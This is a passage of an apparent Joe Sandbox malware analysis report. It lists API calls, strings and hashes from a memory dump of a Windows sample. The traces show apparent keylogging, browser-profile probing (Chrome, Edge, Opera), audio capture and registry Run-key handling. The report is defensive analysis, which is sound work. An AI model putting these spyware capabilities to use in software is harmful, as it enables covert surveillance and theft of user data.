                                              • GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00447B68,?,00000000,00401D55), ref: 00448956
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DateFormat
                                              • String ID: GetDateFormatEx$v%(/
                                              • API String ID: 2793631785-643211610
                                              • Opcode ID: 0b66ff48f69ef4dc5398cb87b9d9a56043f6319d018847ffafb9003893f5b807
                                              • Instruction ID: f6941c7478d5eab8e57398c9d6433ca31c473008bc8aa5bb9dba32c70cc90d51
                                              • Opcode Fuzzy Hash: 0b66ff48f69ef4dc5398cb87b9d9a56043f6319d018847ffafb9003893f5b807
                                              • Instruction Fuzzy Hash: 7101483254060DFBCF026F90DD02EAE3F62EB18711F404529FE0556162DB3A8932EB99
                                              APIs
                                              • waveInPrepareHeader.WINMM(005BF490,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                              • waveInAddBuffer.WINMM(005BF490,00000020,?,00000000,00401A15), ref: 0040185F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$BufferHeaderPrepare
                                              • String ID: XMG
                                              • API String ID: 2315374483-813777761
                                              • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                              • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                              • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                              • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                              APIs
                                              • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004540DC,?,00000000,?,?,0045407B,?,?,?,004540DC), ref: 0044870C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompareString
                                              • String ID: v%(/${@E
                                              • API String ID: 1825529933-1456095189
                                              • Opcode ID: c59ff1600e81a9d7cc14e49ba47d46eb51e483d76546d1775d30d5012d646167
                                              • Instruction ID: 8e6736c838897f6528360bd958164f8ce9b2e0187cfd10d1682bb83c2631b037
                                              • Opcode Fuzzy Hash: c59ff1600e81a9d7cc14e49ba47d46eb51e483d76546d1775d30d5012d646167
                                              • Instruction Fuzzy Hash: 1F010032500209FBCF02AF90EC01CAE7F66EF48350F018159FE0866220CB36C931EB98
                                              APIs
                                              • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00447B68,?,00000000,00401D55), ref: 00448A86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FormatTime
                                              • String ID: GetTimeFormatEx$v%(/
                                              • API String ID: 3606616251-428954383
                                              • Opcode ID: a25a69d334290a7730d5cedf2ff1b41080d39f4413cc30e31ec7bc367f155a45
                                              • Instruction ID: 5d578e1c3c206df355c43574921470766163c15c74a73bc4749945e38d66d5e1
                                              • Opcode Fuzzy Hash: a25a69d334290a7730d5cedf2ff1b41080d39f4413cc30e31ec7bc367f155a45
                                              • Instruction Fuzzy Hash: CDF0AF3164060CFBDF02AF61DC02EAF7F25EF08701F00456AFC0566262DA768D25ABD9
                                              APIs
                                              • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00451688,?,00000055,00000050), ref: 00448AE7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DefaultUser
                                              • String ID: GetUserDefaultLocaleName$v%(/
                                              • API String ID: 3358694519-3008031579
                                              • Opcode ID: 9ff306badc4e225411c88e932eb7d54158c9f5ea469d8c83c365f0a47e873b96
                                              • Instruction ID: cb50fb5ec78b6d707ffa4f8e888d61193b675851c302ce42c921a9a72cfaf747
                                              • Opcode Fuzzy Hash: 9ff306badc4e225411c88e932eb7d54158c9f5ea469d8c83c365f0a47e873b96
                                              • Instruction Fuzzy Hash: 5CF02431640208FBDB016F65DC02E9EBF61EB04711F00406FFD08AA192EEB98D14968D
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: `#[
                                              • API String ID: 269201875-4119260463
                                              • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                              • Instruction ID: 4a6f060c21597e0392f33703011e6e0157da39883ddad7ec559e06d861eb6f1f
                                              • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                              • Instruction Fuzzy Hash: 64E0E532A0152014F6713A3B6D1665B45C68BC1B3AF22423FF425962C2DFAC8946516E
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                              • API String ID: 1174141254-4188645398
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                              Strings
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                              • API String ID: 1174141254-2800177040
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                              Strings
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: AppData$\Opera Software\Opera Stable\
                                              • API String ID: 1174141254-1629609700
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: _free
                                              • String ID: $G
                                              • API String ID: 269201875-4251033865
                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                              Strings
                                              Similarity
                                              • API ID: CountCriticalInitializeSectionSpin
                                              • String ID: InitializeCriticalSectionEx$v%(/
                                              • API String ID: 2593887523-519604286
                                              APIs
                                              • GetKeyState.USER32(00000011), ref: 0040B686
                                                • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                              Strings
                                              Similarity
                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                              • String ID: [AltL]$[AltR]
                                              • API String ID: 2738857842-2658077756
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Free
                                              • String ID: FlsFree$v%(/
                                              • API String ID: 3978063606-3079978385
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Alloc
                                              • String ID: FlsAlloc$v%(/
                                              • API String ID: 2773662609-593808476
                                              APIs
                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                              Strings
                                              Similarity
                                              • API ID: Time$FileSystem
                                              • String ID: GetSystemTimePreciseAsFileTime$v%(/
                                              • API String ID: 2086374402-1868180595
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                              Strings
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID: !D@$open
                                              • API String ID: 587946157-1586967515
                                              APIs
                                              • GetKeyState.USER32(00000012), ref: 0040B6E0
                                              Strings
                                              Similarity
                                              • API ID: State
                                              • String ID: [CtrlL]$[CtrlR]
                                              • API String ID: 1649606143-2446555240
                                              APIs
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                              Strings
                                              Similarity
                                              • API ID: Init_thread_footer__onexit
                                              • String ID: ,kG$0kG
                                              • API String ID: 1881088180-2015055088
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,8)[,004752F0,?,pth_unenc), ref: 00413A6C
                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                              Similarity
                                              • API ID: DeleteOpenValue
                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                              • API String ID: 2654517830-1051519024
                                              APIs
                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                              Strings
                                              Similarity
                                              • API ID: ObjectProcessSingleTerminateWait
                                              • String ID: pth_unenc
                                              • API String ID: 1872346434-4028850238
                                              • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                              • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                              • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                              • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CommandLine
                                              • String ID: 8(Z
                                              • API String ID: 3253501508-64650106
                                              • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                              • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                              • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                              • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                              • GetLastError.KERNEL32 ref: 00440D85
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                              • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                              • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                              • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                              APIs
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                              • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastRead
                                              • String ID:
                                              • API String ID: 4100373531-0
                                              • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                              • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                              • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                              • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99